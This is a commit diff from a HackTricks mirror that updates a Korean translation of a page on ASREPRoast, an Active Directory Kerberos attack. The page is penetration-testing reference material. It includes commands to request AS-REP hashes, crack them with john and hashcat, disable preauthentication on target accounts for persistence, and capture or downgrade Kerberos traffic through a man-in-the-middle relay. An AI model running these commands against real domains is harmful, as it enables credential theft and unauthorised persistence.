mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/windows-hardening/active-directory-methodology/asreproa
This commit is contained in:
parent
929343cfde
commit
1cdcf46a52
@ -4,7 +4,7 @@
|
||||
|
||||
## ASREPRoast
|
||||
|
||||
ASREPRoast는 **Kerberos 사전 인증 필수 속성**이 없는 사용자를 악용하는 보안 공격입니다. 본질적으로 이 취약점은 공격자가 사용자의 비밀번호 없이 도메인 컨트롤러(DC)에서 사용자 인증을 요청할 수 있게 합니다. 그러면 DC는 사용자의 비밀번호에서 파생된 키로 암호화된 메시지로 응답하며, 공격자는 이를 오프라인에서 크랙하여 사용자의 비밀번호를 알아내려고 시도할 수 있습니다.
|
||||
ASREPRoast는 **Kerberos 사전 인증 필수 속성**이 없는 사용자를 악용하는 보안 공격입니다. 본질적으로 이 취약점은 공격자가 사용자의 비밀번호 없이 도메인 컨트롤러(DC)에서 사용자 인증을 요청할 수 있게 합니다. 그러면 DC는 사용자의 비밀번호에서 파생된 키로 암호화된 메시지로 응답하며, 공격자는 이를 오프라인에서 크랙하여 사용자의 비밀번호를 발견하려고 시도할 수 있습니다.
|
||||
|
||||
이 공격의 주요 요구 사항은 다음과 같습니다:
|
||||
|
||||
@ -33,27 +33,27 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
|
||||
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
|
||||
```
|
||||
> [!WARNING]
|
||||
> AS-REP 로스팅을 Rubeus로 수행하면 4768이 생성되며, 암호화 유형은 0x17이고 사전 인증 유형은 0입니다.
|
||||
> AS-REP Roasting with Rubeus는 0x17의 암호화 유형과 0의 사전 인증 유형을 가진 4768을 생성합니다.
|
||||
|
||||
### 크래킹
|
||||
```bash
|
||||
john --wordlist=passwords_kerb.txt hashes.asreproast
|
||||
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
```
|
||||
### 지속성
|
||||
### Persistence
|
||||
|
||||
**GenericAll** 권한(또는 속성을 쓸 수 있는 권한)이 있는 사용자에 대해 **preauth**를 강제할 필요가 없습니다:
|
||||
사용자에게 **GenericAll** 권한(또는 속성 쓰기 권한)이 있는 경우 **preauth**가 필요하지 않도록 강제합니다:
|
||||
```bash:Using Windows
|
||||
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
|
||||
```
|
||||
|
||||
```bash:Using Linux
|
||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
|
||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
|
||||
```
|
||||
## ASREProast 자격 증명 없이
|
||||
## ASREProast without credentials
|
||||
|
||||
공격자는 중간자 위치를 사용하여 AS-REP 패킷을 캡처할 수 있으며, 이는 Kerberos 사전 인증이 비활성화되지 않은 상태에서도 네트워크를 통과합니다. 따라서 VLAN의 모든 사용자에게 작동합니다.\
|
||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher)를 사용하면 이를 수행할 수 있습니다. 또한 이 도구는 Kerberos 협상을 변경하여 클라이언트 워크스테이션이 RC4를 사용하도록 강제합니다.
|
||||
공격자는 중간자 공격 위치를 사용하여 AS-REP 패킷을 캡처할 수 있으며, 이는 Kerberos 사전 인증이 비활성화되는 것에 의존하지 않고 네트워크를 통과합니다. 따라서 VLAN의 모든 사용자에게 작동합니다.\
|
||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) 를 사용하면 가능합니다. 또한, 이 도구는 Kerberos 협상을 변경하여 클라이언트 워크스테이션이 RC4를 사용하도록 강제합니다.
|
||||
```bash
|
||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
|
||||
ASRepCatcher relay -dc $DC_IP
|
||||
@ -64,7 +64,7 @@ ASRepCatcher relay -dc $DC_IP --disable-spoofing
|
||||
# Passive listening of AS-REP packets, no packet alteration
|
||||
ASRepCatcher listen
|
||||
```
|
||||
## 참고 문헌
|
||||
## References
|
||||
|
||||
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user